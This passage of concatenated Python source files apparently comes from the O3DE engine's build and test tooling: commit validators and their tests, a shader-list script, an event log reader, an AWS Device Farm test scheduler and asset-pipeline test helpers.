get_required_env(env, required_env_list): print('ERROR: Required environment variable is not set, see log for more details.') delete_old_branch_ebs_volumes(env) if __name__ == "__main__": main() ``` #### File: scripts/bundler/get_shader_list.py ```python import argparse import os import pathlib import subprocess def error(msg): print(msg) exit(1) def is_windows(): if os.name == 'nt': return True else: return False def get_shader_list(project_path, asset_platform, shader_type, shader_platform, shadergen_path): """ Gets the shader list for a specific platform using ShaderCacheGen. 
Right now the shader list will always output at <project-path>/user/Cache/Shaders That will change when this is updated to take a destination path """ shadergen_path = os.path.join(shadergen_path, 'ShaderCacheGen') if is_windows(): shadergen_path += '.exe' command_args = [ shadergen_path, f'--project-path={str(project_path)}' '--GetShaderList', '--ShadersPlatform={}'.format(shader_type), '--TargetPlatform={}'.format(asset_platform) ] if not os.path.isfile(shadergen_path): error("[ERROR] ShaderCacheGen could not be found at {}".format(shadergen_path)) else: command = ' '.join(command_args) print('[INFO] get_shader_list: Running command - {}'.format(command)) try: subprocess.check_call(command, shell=True) except subprocess.CalledProcessError: error('[ERROR] Failed to get the shader list for {}'.format(shader_type)) parser = argparse.ArgumentParser(description='Gets the shader list for a specific platform from the current shader compiler server') parser.add_argument('-g', '--project-path', type=pathlib.Path, required=True, help="Path to the project") parser.add_argument('asset-platform', type=str, help="The asset cache sub folder to use for shader generation") parser.add_argument('shader-type', type=str, help="The shader type to use") parser.add_argument('-p', '--shader_platform', type=str, required=False, default='', help="The target platform to generate shaders for.") parser.add_argument('-s', '--shadergen_path', type=str, help="Path to where the the ShaderCacheGen executable lives") args = parser.parse_args() print('Getting shader list for {}'.format(args.asset_platform)) get_shader_list(args.project_path, args.asset_platform, args.shader_type, args.shader_platform, args.shadergen_path) print('Finish getting shader list') ``` #### File: tests/validators/test_git_conflict_validator.py ```python import unittest from unittest.mock import patch, mock_open from commit_validation.tests.mocks.mock_commit import MockCommit from commit_validation.validators.git_conflict_validator import GitConflictValidator class NewlineValidatorTests(unittest.TestCase): @patch('builtins.open', mock_open(read_data='This file is completely normal\n' 'and should pass\n')) def test_HasConflictMarkers_NoMarkers_Pass(self): commit = MockCommit(files=['/someFile.cpp']) error_list = [] self.assertTrue(GitConflictValidator().run(commit, error_list)) self.assertEqual(len(error_list), 0, f"Unexpected errors: {error_list}") @patch('builtins.open', mock_open(read_data='This file has a start marker\n' '<<<<<<< ours\n' 'and should fail\n')) def test_HasConflictMarkers_StartMarker_Fail(self): commit = MockCommit(files=['/someFile.cpp']) error_list = [] self.assertFalse(GitConflictValidator().run(commit, error_list)) self.assertNotEqual(len(error_list), 0, f"Errors were expected but none were returned.") @patch('builtins.open', mock_open(read_data='This file has a diff3 marker from using --conflict=diff3\n' '||||||| base\n' 'and should fail\n')) def test_HasConflictMarkers_BaseMarker_Fail(self): commit = MockCommit(files=['/someFile.cpp']) error_list = [] self.assertFalse(GitConflictValidator().run(commit, error_list)) self.assertNotEqual(len(error_list), 0, f"Errors were expected but none were returned.") @patch('builtins.open', mock_open(read_data='This file has a diff marker\n' '=======\n' 'and should fail\n')) def test_HasConflictMarkers_DiffMarker_Fail(self): commit = MockCommit(files=['/someFile.cpp']) error_list = [] self.assertFalse(GitConflictValidator().run(commit, error_list)) self.assertNotEqual(len(error_list), 0, 
f"Errors were expected but none were returned.") @patch('builtins.open', mock_open(read_data='This file has and end marker\n' '>>>>>>> theirs\n' 'and should fail\n')) def test_HasConflictMarkers_EndMarker_Fail(self): commit = MockCommit(files=['/someFile.cpp']) error_list = [] self.assertFalse(GitConflictValidator().run(commit, error_list)) self.assertNotEqual(len(error_list), 0, f"Errors were expected but none were returned.") @patch('builtins.open', mock_open(read_data='This file has a equals sign divider of length seven, but is indented\n' ' /*\n' ' =======\n' ' */' 'and should pass\n')) def test_HasConflictMarkers_IndentedCommentDivider_Pass(self): commit = MockCommit(files=['/someFile.cpp']) error_list = [] self.assertTrue(GitConflictValidator().run(commit, error_list)) self.assertEqual(len(error_list), 0, f"Unexpected errors: {error_list}") @patch('builtins.open', mock_open(read_data='This file has an unindented equals sign divider, of length eight\n' '/*\n' '========\n' '*/' 'and should pass\n')) def test_HasConflictMarkers_LongCommentDivider_Pass(self): commit = MockCommit(files=['/someFile.cpp']) error_list = [] self.assertTrue(GitConflictValidator().run(commit, error_list)) self.assertEqual(len(error_list), 0, f"Unexpected errors: {error_list}") @patch('builtins.open', mock_open(read_data='This file has an unindented equals sign divider, of length six\n' '/*\n' '======\n' '*/' 'and should pass\n')) def test_HasConflictMarkers_ShortCommentDivider_Pass(self): commit = MockCommit(files=['/someFile.cpp']) error_list = [] self.assertTrue(GitConflictValidator().run(commit, error_list)) self.assertEqual(len(error_list), 0, f"Unexpected errors: {error_list}") if __name__ == '__main__': unittest.main() ``` #### File: commit_validation/validators/unicode_validator.py ```python import fnmatch import os.path from typing import Type, List from commit_validation.commit_validation import Commit, CommitValidator, IsFileSkipped, SOURCE_AND_SCRIPT_FILE_EXTENSIONS, EXCLUDED_VALIDATION_PATTERNS, VERBOSE allowed_chars = { 0xAD, # '_' 0xAE, # '®' 0xB0, # '°' } class UnicodeValidator(CommitValidator): """A file-level validator that makes sure a file does not contain unicode characters""" def run(self, commit: Commit, errors: List[str]) -> bool: for file_name in commit.get_files(): if IsFileSkipped(file_name): if VERBOSE: print(f'{file_name}::{self.__class__.__name__} SKIPPED UnicodeValidator - File excluded based on extension.') continue for pattern in EXCLUDED_VALIDATION_PATTERNS: if fnmatch.fnmatch(file_name, pattern): if VERBOSE: print(f'{file_name} SKIPPED UnicodeValidator - Validation pattern excluded on path.') break else: with open(file_name, 'r', encoding='utf-8', errors='strict') as fh: linecount = 1 for line in fh: columncount = 0 for ch in line: ord_ch = ord(ch) if ord_ch > 127 and ord_ch not in allowed_chars: error_message = str(f'{file_name}::{self.__class__.__name__}:{linecount},{columncount} FAILED - Source file contains unicode character, replace with \\u{ord_ch:X}.') errors.append(error_message) if VERBOSE: print(error_message) columncount += 1 linecount += 1 return (not errors) def get_validator() -> Type[UnicodeValidator]: """Returns the validator class for this module""" return UnicodeValidator ``` #### File: scripts/commit_validation/p4_validate_changelist.py ```python import argparse import os import sys from typing import Dict, List import difflib from commit_validation.commit_validation import Commit, validate_commit from p4 import run_p4_command class P4Changelist(Commit): 
"""An implementation of the :class:`Commit` interface for accessing details about a Perforce changelist""" def __init__(self, client: str = None, change: str = 'default') -> None: """Creates a new instance of :class:`P4Changelist` :param client: the Perforce client :param change: the Perforce changelist """ self.client = client self.change = change self.files: List[str] = [] self.removed_files: List[str] = [] self.file_diffs: Dict[str, str] = {} self._load_files() def _load_files(self): self.files = [] self.removed_files = [] self.added_files = [] client_spec = run_p4_command(f'client -o', client=self.client)[0] files = run_p4_command(f'opened -c {self.change}', client=self.client) for f in files: file_path = os.path.abspath(f['clientFile'].replace(f'//{client_spec["Client"]}', client_spec['Root'])) if 'delete' in f['action']: self.removed_files.append(file_path) elif 'add' in f['action']: self.added_files.append(file_path) elif 'branch' in f['action']: self.added_files.append(file_path) else: self.files.append(file_path) def get_file_diff(self, file) -> str: if file in self.file_diffs: # allow caching return self.file_diffs[file] if file in self.added_files: # added files return the entire file as a diff. with open(file, "rt", encoding='utf8', errors='replace') as opened_file: data = opened_file.readlines() diffs = difflib.unified_diff([], data, fromfile=file, tofile=file) diff_being_built = ''.join(diffs) self.file_diffs[file] = diff_being_built return diff_being_built if file not in self.files: raise RuntimeError(f"Cannot calculate a diff for a file not in the changelist: {file}") try: result = run_p4_command(f'diff -du {file}', client=self.client) if len(result) > 1: diff = result[1]['data'] # p4 returns a normal code but with no result if theres no diff else: diff = '' print(f'Warning: File being committed contains no changes {file}') # note that the p4 command handles the data and errors internally, no need to check. 
self.file_diffs[file] = diff return diff except RuntimeError as e: print(f'error during p4 operation, unable to get a diff: {e}') return '' def get_files(self) -> List[str]: # this is just files relevant to the operation return self.files + self.added_files def get_removed_files(self) -> List[str]: return self.removed_files def get_description(self) -> str: raise NotImplementedError def get_author(self) -> str: raise NotImplementedError def init_parser(): """Prepares the command line parser""" parser = argparse.ArgumentParser() parser.add_argument('--client', help='Perforce client') parser.add_argument('--change', default='default', help='Perforce changelist') return parser def main(): parser = init_parser() args = parser.parse_args() change = P4Changelist(client=args.client, change=args.change) if not validate_commit(commit=change, ignore_validators=["NewlineValidator", "WhitespaceValidator"]): sys.exit(1) sys.exit(0) if __name__ == '__main__': main() ``` #### File: o3de/scripts/o3de.py ```python import argparse import pathlib import sys def add_args(parser, subparsers) -> None: """ add_args is called to add expected parser arguments and subparsers arguments to each command such that it can be invoked by o3de.py Ex o3de.py can invoke the register downloadable commands by importing register, call add_args and execute: python o3de.py register --gem-path "C:/TestGem" :param parser: the caller instantiates a parser and passes it in here :param subparsers: the caller instantiates subparsers and passes it in here """ # As o3de.py shares the same name as the o3de package attempting to use a regular # from o3de import <module> line tries to import from the current o3de.py script and not the package # So the {current script directory} / 'o3de' is added to the front of the sys.path script_dir = pathlib.Path(__file__).parent o3de_package_dir = (script_dir / 'o3de').resolve() # add the scripts/o3de directory to the front of the sys.path sys.path.insert(0, str(o3de_package_dir)) from o3de import engine_template, global_project, register, print_registration, get_registration, \ enable_gem, disable_gem, project_properties, sha256 # Remove the temporarily added path sys.path = sys.path[1:] # global_project global_project.add_args(subparsers) # engine templaate engine_template.add_args(subparsers) # register register.add_args(subparsers) # show print_registration.add_args(subparsers) # get-registered get_registration.add_args(subparsers) # add a gem to a project enable_gem.add_args(subparsers) # remove a gem from a project disable_gem.add_args(subparsers) # modify project properties project_properties.add_args(subparsers) # sha256 sha256.add_args(subparsers) if __name__ == "__main__": # parse the command line args the_parser = argparse.ArgumentParser() # add subparsers the_subparsers = the_parser.add_subparsers(help='sub-command help') # add args to the parser add_args(the_parser, the_subparsers) # parse args the_args = the_parser.parse_args() # if empty print help if len(sys.argv) == 1: the_parser.print_help(sys.stderr) sys.exit(1) # run ret = the_args.func(the_args) # return sys.exit(ret) ``` #### File: EventLogTools/EventLogger/Reader.py ```python from EventLogger.Utils import EventBoundary, EventHeader, EventNameHash, LogHeader, Prolog, PrologId def size_align_up(size, align): return (size + (align - 1)) & ~(align - 1) class Reader(object): ReadStatus_Success = 0 ReadStatus_InsufficientFileSize = -1 ReadStatus_InvalidFormat = -2 ReadStatus_NoEvents = -3 def __init__(self): self.log_header = 
LogHeader() self.current_event = EventHeader() self.current_thread_id = None self.buffer = None self.buffer_size = 0 self.buffer_pos = 0 def read_log_file(self, file_path): with open(file_path, mode='rb') as log_file: self.buffer = log_file.read() self.buffer_size = len(self.buffer) if self.buffer_size < LogHeader.size(): return Reader.ReadStatus_InsufficientFileSize self.log_header.unpack(self.buffer) self.buffer_pos = LogHeader.size() if self.log_header.get_format() not in LogHeader.accepted_formats(): return Reader.ReadStatus_InvalidFormat if self.buffer_pos + EventHeader.size() > self.buffer_size: return Reader.ReadStatus_NoEvents self.current_event.unpack(self._get_next(EventHeader.size())) self._update_thread_id() return Reader.ReadStatus_Success def get_log_header(self): return self.log_header def get_thread_id(self): return self.current_thread_id def get_event_name(self): return EventNameHash(self.current_event.event_id) def get_event_size(self): return self.current_event.size def get_event_flags(self): return self.current_event.flags def get_event_data(self): start = self.buffer_pos + EventHeader.size() return self._get_next(self.get_event_size(), override_start=start) def get_event_string(self): string_data = self.get_event_data() return string_data.decode('utf-8') def next(self): real_size = EventHeader.size() + self.get_event_size() self.buffer_pos += size_align_up(real_size, EventBoundary) if self.buffer_pos < self.buffer_size: self.current_event.unpack(self._get_next(EventHeader.size())) self._update_thread_id() return True return False def _get_next(self, size, override_start=None): start = override_start or self.buffer_pos end = start + size return self.buffer[start:end] def _update_thread_id(self): if self.get_event_name() == PrologId: prolog = Prolog() prolog.unpack(self._get_next(Prolog.size())) self.current_thread_id = prolog.thread_id ``` #### File: Tools/LauncherTestTools/device_farm_schedule_run.py ```python import argparse import datetime import json import logging import os import subprocess import sys import time import requests logger = logging.getLogger(__name__) def bake_template(filename, values): """Open a template and replace values. Return path to baked file.""" # Open the options json template and replace with real values. with open(filename, 'r') as in_file: data = in_file.read() for key, value in values.iteritems(): data = data.replace(key, str(value)) filename_out = os.path.join('temp', filename) with open(filename_out, 'w') as out_file: out_file.write(data) return filename_out def execute_aws_command(args): """ Execut the aws cli devicefarm command. """ # Use .cmd on Windows, not sure exactly why, but aws will not be found without it. aws_executable = 'aws.cmd' if sys.platform.startswith('win') else 'aws' aws_args = [aws_executable, 'devicefarm', '--region', 'us-west-2'] + args logger.info("Running {} ...".format(" ".join(aws_args))) p = subprocess.Popen(aws_args, stdout=subprocess.PIPE) out, err = p.communicate() if p.returncode != 0: msg = "Command '{}' failed. return code: {} out: {} err: {}".format( " ".join(aws_args), p.returncode, out, err ) raise Exception(msg) return out def find_or_create_project(project_name): """ Find the project by name, or create a new one. 
""" list_projects_data = json.loads(execute_aws_command(['list-projects'])) # return the arn if it is found for project_data in list_projects_data['projects']: if project_data['name'] == project_name: logger.info("Found existing project named {}.".format(project_name)) return project_data['arn'] # project not found, create a new project with the give name project_data = json.loads(execute_aws_command(['create-project', '--name', project_name])) return project_data['project']['arn'] def find_or_create_device_pool(project_name, device_pool_name, device_arns): """ Find the device pool in the project by name, or create a new one. """ list_device_pools_data = json.loads(execute_aws_command(['list-device-pools', '--arn', project_name])) # return the arn if it is found for device_pool_data in list_device_pools_data['devicePools']: if device_pool_data['name'] == device_pool_name: logger.info("Found existing device pool named {}.".format(device_pool_name)) return device_pool_data['arn'] device_pool_json_path_out = bake_template( 'device_farm_default_device_pool_template.json', {'%DEVICE_ARN_LIST%' : device_arns}) # create a default device pool args = [ 'create-device-pool', '--project-arn', project_name, '--name', device_pool_name, '--rules', "file://{}".format(device_pool_json_path_out)] device_pools_data = json.loads(execute_aws_command(args)) return device_pools_data['devicePool']['arn'] def create_upload(project_arn, path, type): """ Create an upload and return the ARN """ args = ['create-upload', '--project-arn', project_arn, '--name', os.path.basename(path), '--type', type] upload_data = json.loads(execute_aws_command(args)) return upload_data['upload']['arn'], upload_data['upload']['url'] def send_upload(filename, url): """ Upload a file with a put request. """ logger.info("Sending upload {} ...".format(filename)) with open(filename, 'rb') as uploadfile: data = uploadfile.read() headers = {"content-type": "application/octet-stream"} output = requests.put(url, data=data, allow_redirects=True, headers=headers) logger.info("Sent upload {}.".format(output)) def wait_for_upload_to_finish(poll_time, upload_arn): """ Wait for an upload to finish by polling for status """ logger.info("Waiting for upload {} ...".format(upload_arn)) upload_data = json.loads(execute_aws_command(['get-upload', '--arn', upload_arn])) while not upload_data['upload']['status'] in ['SUCCEEDED', 'FAILED']: time.sleep(poll_time) upload_data = json.loads(execute_aws_command(['get-upload', '--arn', upload_arn])) if upload_data['upload']['status'] != 'SUCCEEDED': raise Exception('Upload failed.') def upload(poll_time, project_arn, path, type): """ Create the upload on the Device Farm, upload the file and wait for completion. 
""" arn, url = create_upload(project_arn, path, type) send_upload(path, url) wait_for_upload_to_finish(poll_time, arn) return arn def schedule_run(project_arn, app_arn, device_pool_arn, test_spec_arn, test_bundle_arn, execution_timeout): """ Schecule the test run on the Device Farm """ run_name = "LY LT {}".format(datetime.datetime.now().strftime("%I:%M%p on %B %d, %Y")) logger.info("Scheduling run {} ...".format(run_name)) schedule_run_test_json_path_out = bake_template( 'device_farm_schedule_run_test_template.json', {'%TEST_SPEC_ARN%' : test_spec_arn, '%TEST_PACKAGE_ARN%' : test_bundle_arn}) execution_configuration_json_path_out = bake_template( 'device_farm_schedule_run_execution_configuration_template.json', {'%EXECUTION_TIMEOUT%' : execution_timeout}) args = [ 'schedule-run', '--project-arn', project_arn, '--app-arn', app_arn, '--device-pool-arn', device_pool_arn, '--name', "\"{}\"".format(run_name), '--test', "file://{}".format(schedule_run_test_json_path_out), '--execution-configuration', "file://{}".format(execution_configuration_json_path_out)] schedule_run_data = json.loads(execute_aws_command(args)) return schedule_run_data['run']['arn'] def download_file(url, output_path): """ download a file from a url, save in output_path """ try: r = requests.get(url, stream=True) r.raise_for_status() output_folder = os.path.dirname(output_path) if not os.path.exists(output_folder): os.makedirs(output_folder) with open(output_path, 'wb') as f: for chunk in r.iter_content(chunk_size=8192): if chunk: f.write(chunk) except requests.exceptions.RequestException as e: logging.exception("Failed request for downloading file from {}.".format(url)) return False except IOError as e: logging.exception("Failed writing to file {}.".format(output_path)) return False return True def download_artifacts(run_arn, artifacts_output_folder): """ Download run artifacts and write to path set in artifacts_output_folder. """ logging.basicConfig(level=logging.DEBUG) list_jobs_data = json.loads(execute_aws_command(['list-jobs', '--arn', run_arn])) for job_data in list_jobs_data['jobs']: logger.info("Downloading artifacts for {} ...".format(job_data['name'])) safe_job_name = "".join(x for x in job_data['name'] if x.isalnum()) list_artifacts_data = json.loads(execute_aws_command(['list-artifacts', '--arn', job_data['arn'], '--type', 'FILE'])) for artifact_data in list_artifacts_data['artifacts']: # A run may contain many jobs. Usually each job is one device type. # Each job has 3 stages: setup, test and shutdown. You can tell what # stage an artifact is from based on the ARN. # We only care about artifacts from the main stage of the job, # not the setup or tear down artifacts. So parse the ARN and look # for the 00001 identifier. 
print artifact_data['arn'] if artifact_data['arn'].split('/')[3] == '00001': logger.info("Downloading artifacts {} ...".format(artifact_data['name'])) output_filename = "{}.{}".format( "".join(x for x in artifact_data['name'] if x.isalnum()), artifact_data['extension']) output_path = os.path.join(artifacts_output_folder, safe_job_name, output_filename) if not download_file(artifact_data['url'], output_path): msg = "Failed to download file from {} and save to {}".format(artifact_data['url'], output_path) logger.error(msg) def main(): parser = argparse.ArgumentParser(description='Upload and app and schedule a run on the Device Farm.') parser.add_argument('--app-path', required=True, help='Path of the app file.') parser.add_argument('--test-spec-path', required=True, help='Path of the test spec yaml.') parser.add_argument('--test-bundle-path', required=True, help='Path of the test bundle zip.') parser.add_argument('--project-name', required=True, help='The name of the project.') parser.add_argument('--device-pool-name', required=True, help='The name of the device pool.') parser.add_argument('--device-arns', default='\\"arn:aws:devicefarm:us-west-2::device:6CCDF49186B64E3FB27B9346AC9FAEC1\\"', help='List of device ARNs. Used when existing pool is not found by name. Default is Galaxy S8.') parser.add_argument('--wait-for-result', default="true", help='Set to "true" to wait for result of run.') parser.add_argument('--download-artifacts', default="true", help='Set to "true" to download artifacts after run. requires --wait-for-result') parser.add_argument('--artifacts-output-folder', default="temp", help='Folder to place the downloaded artifacts.') parser.add_argument('--upload-poll-time', default=10, help='How long to wait between polling upload status.') parser.add_argument('--run-poll-time', default=60, help='How long to wait between polling run status.') parser.add_argument('--run-execution-timeout', default=60, help='Run execution timeout.') parser.add_argument('--test-names', nargs='+', help='A list of test names to run, default runs all tests.') args = parser.parse_args() logging.basicConfig(level=logging.DEBUG) # Find the project by name, or create a new one. project_arn = find_or_create_project(args.project_name) # Find the device pool in the project by name, or create a new one. device_pool_arn = find_or_create_device_pool(project_arn, args.device_pool_name, args.device_arns) # Bake out EXTRA_ARGS option with args.test_names extra_args = "" if args.test_names: extra_args = "--test-names {}".format(" ".join("\"{}\"".format(test_name) for test_name in args.test_names)) test_spec_path_out = bake_template( args.test_spec_path, {'%EXTRA_ARGS%' : extra_args}) # Upload test spec and test bundle (Appium js is just a generic avenue to our own custom code). test_spec_arn = upload(args.upload_poll_time, project_arn, test_spec_path_out, 'APPIUM_NODE_TEST_SPEC') test_bundle_arn = upload(args.upload_poll_time, project_arn, args.test_bundle_path, 'APPIUM_NODE_TEST_PACKAGE') # Upload the app. type = 'ANDROID_APP' if args.app_path.lower().endswith('.apk') else 'IOS_APP' app_arn = upload(args.upload_poll_time, project_arn, args.app_path, type) # Schedule the test run. run_arn = schedule_run(project_arn, app_arn, device_pool_arn, test_spec_arn, test_bundle_arn, args.run_execution_timeout) logger.info('Run scheduled.') # Wait for run, exit with failure if test run fails. # strcmp with true for easy of use jenkins boolean env var. 
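    # The block below polls the run until its result leaves 'PENDING', optionally downloads
    # the artifacts, and raises (failing the Jenkins job) for any result other than 'PASSED'.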
if args.wait_for_result.lower() == 'true': # Runs can take a long time, so just poll once a mintue by default. run_data = json.loads(execute_aws_command(['get-run', '--arn', run_arn])) while run_data['run']['result'] == 'PENDING': logger.info("Run status: {} waiting {} seconds ...".format(run_data['run']['result'], args.run_poll_time)) time.sleep(args.run_poll_time) run_data = json.loads(execute_aws_command(['get-run', '--arn', run_arn])) # Download run artifacts. strcmp with true for easy of use jenkins boolean env var. if args.download_artifacts.lower() == 'true': download_artifacts(run_arn, args.artifacts_output_folder) # If the run did not pass raise an exception to fail this jenkins job. if run_data['run']['result'] != 'PASSED': # Dump all of the run info. logger.info(run_data) # Raise an exception to fail this test. msg = "Run fail with result {}\nRun ARN: {}".format(run_data['run']['result'], run_arn) raise Exception(msg) logger.info('Run passed.') if __name__== "__main__": main() ``` #### File: ly_test_tools/o3de/pipeline_utils.py ```python import pytest import binascii import hashlib import os import re import hashlib import shutil import logging import subprocess import psutil from configparser import ConfigParser from typing import Dict, List, Tuple, Optional, Callable # Import LyTestTools import ly_test_tools.environment.file_system as fs import ly_test_tools.environment.process_utils as process_utils from ly_test_tools.o3de.ap_log_parser import APLogParser logger = logging.getLogger(__name__) # Asset Processor fast scan system setting key/subkey AP_FASTSCAN_KEY = r"Software\O3DE\O3DE Asset Processor\Options" AP_FASTSCAN_SUBKEY = r"EnableZeroAnalysis" class ProcessOutput(object): # Process data holding object def __init__(self) -> None: # type() -> None self.stdout = None self.stderr = None self.returncode = None self.exception_occurred = False def compare_assets_with_cache(assets: List[str], assets_cache_path: str) -> Tuple[List[str], List[str]]: """ Given a list of assets names, will try to find them (disrespecting file extensions) from project's Cache folder with test assets :param assets: A list of assets to be compared with Cache :param assets_cache_path: A path to cache test assets folder :return: A tuple with two lists - first is missing in cache assets, second is existing in cache assets """ missing_assets = [] existing_assets = [] if os.path.exists(assets_cache_path): files_in_cache = list(map(fs.remove_path_and_extension, os.listdir(assets_cache_path))) for asset in assets: file_without_ext = fs.remove_path_and_extension(asset).lower() if file_without_ext in files_in_cache: existing_assets.append(file_without_ext) files_in_cache.remove(file_without_ext) else: missing_assets.append(file_without_ext) else: missing_assets = assets return missing_assets, existing_assets def copy_assets_to_project(assets: List[str], source_directory: str, target_asset_dir: str) -> None: """ Given a list of asset names and a directory, copy those assets into the target project directory :param assets: A list of asset names to be copied :param source_directory: A path string where assets are located :param target_asset_dir: A path to project tests assets directory where assets will be copied over to :return: None """ if not os.path.exists(target_asset_dir): os.mkdir(target_asset_dir) for asset in assets: full_name = os.path.join(source_directory, asset) destination_fullname = os.path.join(target_asset_dir, asset) if os.path.isdir(full_name): shutil.copytree(full_name, destination_fullname) 
else: shutil.copyfile(full_name, destination_fullname) os.chmod(destination_fullname, 0o0777) def prepare_test_assets(assets_path: str, function_name: str, project_test_assets_dir: str) -> str: """ Given function name and assets cache path, will clear cache and copy test assets assigned to function name to project's folder :param assets_path: Path to tests assets folder :param function_name: Name of a function that corresponds to folder with assets :param project_test_assets_dir: A path to project directory with test assets :return: Returning path to copied assets folder """ test_assets_folder = os.path.join(assets_path, "assets", function_name) # Some tests don't have any assets to copy, which is fine, we don't want to fail in that case if os.path.exists(test_assets_folder): copy_assets_to_project(os.listdir(test_assets_folder), test_assets_folder, project_test_assets_dir) return test_assets_folder def find_joblog_file(joblogs_path: str, regexp: str) -> str: """ Given path to joblogs files and asset name in form of regexp, will try to find joblog file for provided asset; if multiple - will return first occurrence :param joblogs_path: Path to a folder with joblogs files to look for needed file :param regexp: Python Regexp to find the joblog file for the asset that was processed :return: Full path to joblog file, empty string if not found """ for file_name in os.listdir(joblogs_path): if re.match(regexp, file_name): return os.path.join(joblogs_path, file_name) return "" def find_missing_lines_in_joblog(joblog_location: str, strings_to_verify: List[str]) -> List[str]: """ Given joblog file full path and list of strings to verify, will find all missing strings in the file :param joblog_location: Full path to joblog file :param strings_to_verify: List of string to look for in joblog file :return: Subset of original strings list, that were not found in the file """ lines_not_found = [] with open(joblog_location, "r") as f: read_data = f.read() for line in strings_to_verify: if line not in read_data: lines_not_found.append(line) return lines_not_found def clear_project_test_assets_dir(test_assets_dir: str) -> None: """ On call - deletes test assets dir if it exists and creates new empty one :param test_assets_dir: A path to tests assets dir :return: None """ if os.path.exists(test_assets_dir): fs.delete([test_assets_dir], False, True) os.mkdir(test_assets_dir) def get_files_hashsum(path_to_files_dir: str) -> Dict[str, int]: """ On call - calculates md5 hashsums for filecontents. :param path_to_files_dir: A path to files directory :return: Returns a dict with initial filenames from path_to_files_dir as keys and their contents hashsums as values """ checksum_dict = {} try: for fname in os.listdir(path_to_files_dir): with open(os.path.join(path_to_files_dir, fname), "rb") as fopen: checksum_dict[fname] = hashlib.sha256(fopen.read()).digest() except IOError: logger.error("An error occurred trying to read file") return checksum_dict def append_to_filename(file_name: str, path_to_file: str, append_text: str, ignore_extension: str) -> None: """ Function for appending text to file and folder names :param file_name: Name of a file or folder :param path_to_file: Path to file or folder :param append_text: Text to append :param ignore_extension: True or False for ignoring extensions :return: None """ if not ignore_extension: (name, extension) = file_name.split(".") new_name = name + append_text + "." 
+ extension else: new_name = file_name + append_text os.rename(os.path.join(path_to_file, file_name), os.path.join(path_to_file, new_name)) def create_asset_processor_backup_directories(backup_root_directory: str, test_backup_directory: str) -> None: """ Function for creating the asset processor logs backup directory structure :param backup_root_directory: The location where logs should be stored :param test_backup_directory: The directory for the specific test being ran :return: None """ if not os.path.exists(os.path.join(backup_root_directory, test_backup_directory)): os.makedirs(os.path.join(backup_root_directory, test_backup_directory)) def backup_asset_processor_logs(bin_directory: str, backup_directory: str) -> None: """ Function for backing up the logs created by asset processor to designated backup directory :param bin_directory: The bin directory created by the lumberyard build process :param backup_directory: The location where asset processor logs should be backed up to :return: None """ ap_logs = os.path.join(bin_directory, "logs") if os.path.exists(ap_logs): destination = os.path.join(backup_directory, "logs") shutil.copytree(ap_logs, destination) def safe_subprocess(command: str or List[str], **kwargs: Dict) -> ProcessOutput: """ Forwards arguments to subprocess.Popen to have a processes output args stdout and stderr can not be passed as they are used internally Setting check = true will change the received out put into a subprocess.CalledProcessError object IMPORTANT: This code might fail after upgrade to python 3 due to interpretation of byte and string data. :param command: A list of the command to execute and its arguments as split by whitespace. :param kwargs: Keyword args forwarded to subprocess.check_output. :return: Popen object with callable attributes that hold the piped out put of the process. 
""" cmd_string = command if type(command) == list: cmd_string = " ".join(command) logger.info(f'Executing "subprocess.Popen({cmd_string})"') # Initialize ProcessOutput object subprocess_output = ProcessOutput() try: # Run process # fmt:off output = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True, **kwargs) # fmt:on # Wait for process to complete output_data = output.communicate() # Read and process pipped outputs subprocess_output.stderr = output_data[1] subprocess_output.stdout = output_data[0] # Save process return code subprocess_output.returncode = output.returncode except subprocess.CalledProcessError as e: # Set object flag subprocess_output.exception_occurred = True # If error occurs when **kwargs includes check=True Exceptions are possible logger.warning(f'Command "{cmd_string}" failed with returncode {e.returncode}, output:\n{e.output}') # Read and process error outputs subprocess_output.stderr = e.output.read().decode() # Save error return code subprocess_output.returncode = e.returncode else: logger.info(f'Successfully executed "check_output({cmd_string})"') return subprocess_output def processes_with_substring_in_name(substring: str) -> tuple: """ Finds all existing processes that contain a specified substring in their names :param substring: the string to look for as a substring within process names :return: a tuple of all processes containing the substring in their names or an empty tuple if none are found """ processes = process_utils._safe_get_processes() targeted_processes = [] for p in processes: try: if substring.lower() in p.name().lower(): targeted_processes.append(p) except psutil.NoSuchProcess as e: logger.info(f"Process {p} was killed during processes_with_substring_in_name()!\nError: {e}") continue return tuple(targeted_processes) def child_process_list(pid: int, name_filter: str = None) -> List[int]: """ Return the list of child process objects of the given pid :param pid: process id of the parent process :param name_filter: optional name to match child processes against :return: List of matching process objects """ return_list = [] for child in psutil.Process(pid).children(recursive=True): if not name_filter or child.name() == name_filter: return_list.append(child) return return_list def process_cpu_usage_below(process_name: str, cpu_usage_threshold: float) -> bool: """ Checks whether CPU usage by a specified process is below a specified threshold :param process_name: String to search for within the names of active processes :param cpu_usage_threshold: Float at or above which CPU usage by a process instance is too high :return: True if the CPU usage for each instance of the specified process is below the threshold, False if not """ # Get all instances of targeted process targeted_processes = processes_with_substring_in_name(process_name) assert len(targeted_processes) > 0, f"No instances of {process_name} were found" # Return whether all instances of targeted process are idle for targeted_process in targeted_processes: logger.info(f"Process name: {targeted_process.name()}") if hasattr(targeted_process, "pid"): logger.info(f"Process ID: {targeted_process.pid}") process_cpu_load = targeted_process.cpu_percent(interval=1) logger.info(f"Process CPU load: {process_cpu_load}") if process_cpu_load >= cpu_usage_threshold: return False return True def temp_test_dir(request, dir_path: str) -> str: """ Creates a temporary test directory to be deleted on teardown :param dir_path: path for the temporary test directory :return: 
path to the temporary test directory """ # Clear the directory if it exists and create the temporary test directory clear_project_test_assets_dir(dir_path) # Delete the directory on teardown request.addfinalizer(lambda: fs.delete([dir_path], False, True)) return dir_path def get_relative_file_paths(start_dir: str, ignore_list: Optional[List[str]] = None) -> List[str]: """ Collects all relative paths for files under the [start_dir] directory tree. Ignores a path if it contains any string in the [ignore_list]. """ if ignore_list is None: ignore_list = [] all_files = [] for root, _, files in os.walk(start_dir): for file_name in files: full_path = os.path.join(root, file_name) if all([False for word in ignore_list if word in full_path]): all_files.append(os.path.relpath(full_path, start_dir)) return all_files def compare_lists(actual: List[str], expected: List[str]) -> bool: """Compares the two lists of strings. Returns false and prints any discrepancies if present.""" # Find difference between expected and actual diff = {"actual": [], "expected": []} for asset in actual: if asset not in expected: diff["actual"].append(asset) for asset in expected: if asset not in actual: diff["expected"].append(asset) # Log difference between actual and expected (if any). Easier for troubleshooting if diff["actual"]: logger.info("The following assets were actually found but not expected:") for asset in diff["actual"]: logger.info(" " + asset) if diff["expected"]: logger.info("The following assets were expected to be found but were actually not:") for 